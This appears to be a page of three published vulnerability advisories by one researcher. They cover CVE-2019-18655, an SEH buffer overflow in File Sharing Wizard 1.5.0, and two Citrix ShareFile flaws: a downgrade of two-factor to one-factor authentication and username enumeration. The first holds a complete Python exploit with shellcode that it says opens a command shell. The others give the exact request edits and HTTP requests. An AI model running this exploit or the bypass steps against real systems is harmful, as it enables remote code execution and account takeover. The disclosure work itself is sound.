CVE-2019-18655: FILE SHARING WIZARD VERSION 1.5 - GET STRUCTURED EXCEPTION HANDLER BASED BUFFER OVERFLOW

Author: Armando Huesca Prida

Summary: 

File Sharing Wizard version 1.5.0 is affected of Structured Exception Handler based buffer overflow vulnerability. An unauthenticated attacker is able to perform remote command execution and obtain a command shell by sending a HTTP GET request including the malicious payload in the URL, a similar issue to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331. 

Software Version: File Sharing Wizard version 1.5.0 build 2008 

Tested OS Versions: 
Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002 
Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601 

Product URL: https://file-sharing-wizard.soft112.com/ 

CVE-ID: CVE-2019-18655 

Details: 

File Sharing Wizard version 1.5.0 build 2008 is affected of Structured Exception Handler based buffer overflow vulnerability. An attacker is able to perform remote command execution and obtain a command shell by sending a HTTP GET request including the malicious payload in the URL, a similar issue to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331. 

Following a Proof of Concept exploit (PoC) in order to exploit this vulnerability.  

################### PoC ################### 
#!/usr/bin/python 
import socket 
import os 
import sys 

# Bad chars: \x00\x20 # 
# SEH value: 0x9090eb08 (JMP short) # 
# NSEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)  

seh='\x6d\x57\x37\x7c' 
nseh='\x90\x90\xeb\x08' 

buf = b"" 
buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31" 
buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb" 
buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c" 
buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19" 
buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11" 
buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e" 
buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a" 
buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77" 
buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78" 
buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4" 
buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f" 
buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18" 
buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b" 
buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf" 
buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b" 
buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b" 
buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde" 

poc= 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949-len(buf)) 
payload='GET //.:/' + poc + ' HTTP/1.0\r\n\r\n' 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect(("172.16.216.135", 80)) 
s.send(payload) 
s.close 

Exploit Note: 

This PoC version was customized with a specific IP address, in order to use it in a different local network a new IP address should be defined. 

Metasploit's Module:  filesharing_wizard_get_bof.rb 

Credit: 

Discovered by Armando Huesca 

CVE 2019-7218: CITRIX SHAREFILE TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR

Author: Armando Huesca Prida

Summary:

An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA).

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7218

Details:

An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA). This way, it is possible to downgrade 2FA to 1FA, without knowing the victim’s password.

In order to exploit this vulnerability, attackers should have access to the offline otp token (physical or virtual): it is not possible to gain access if the otp is generated after the phase 1 authentication and sent to the client via SMS or phone call.

This vulnerability takes place because the server does not control that client’s phase 1 authentication succeeded before validating phase 2 authentication (authentication schema).

Example:

An attacker is able to intercept the log-in request with garbage data and use this request as base for the attack, changing the op and password parameters as follows:

Figure 1 - phase 1 default log-in request and response

Request modifications:

change op=webflow-auth with op=webflow-verify
change password=* with code=[OTP]

In case that the username/otp combination is correct (phase 2 succeeded), phase 1 authentication is bypassed and unauthorized access to the application is gained by the attacker as shown below:

Figure 2 - Evil phase 2 request with modified parameters

Follows the proof of unathorized access to the web application by exploiting this vulnerability.

Figure 3 - Unauthorized access to the application

Advice:

Make sure that client’s phase 1 authentication succeeded before validating phase 2 authentication.

Timeline:

28-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release

Credit:

Discovered by Andrea Pessione and Armando Huesca of SKIT Cyber Security

CVE 2019-7217: CITRIX SHAREFILE USER ENUMERATION

 

Author: Armando Huesca Prida

Summary:

It is possible to enumerate application username based on different server responses using the request to check the otp code. No authentication is required.

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7217

Details:

It is possible to enumerate application username based on different server responses using the request to check the otp code. No authentication is required.

Following an example of HTTP request:

POST /oauth/oauthapi.aspx HTTP/1.1

Host: xxx.sharefile.eu

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://xxx.sharefile.eu/Authentication/Login

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Content-Length: 293

Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&

client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&

redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123

Response if username is not correct:

{"error":true,"errorMessage":"You are not authorized to use this client","errorCode":126}

Response if username is correct:

{"error":true,"errorMessage":"Unable to verify two factor code.","errorCode":122}

Timeline:

22-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release

Credit:

Discovered by Armando Huesca and Andrea Pessione of SKIT Cyber Security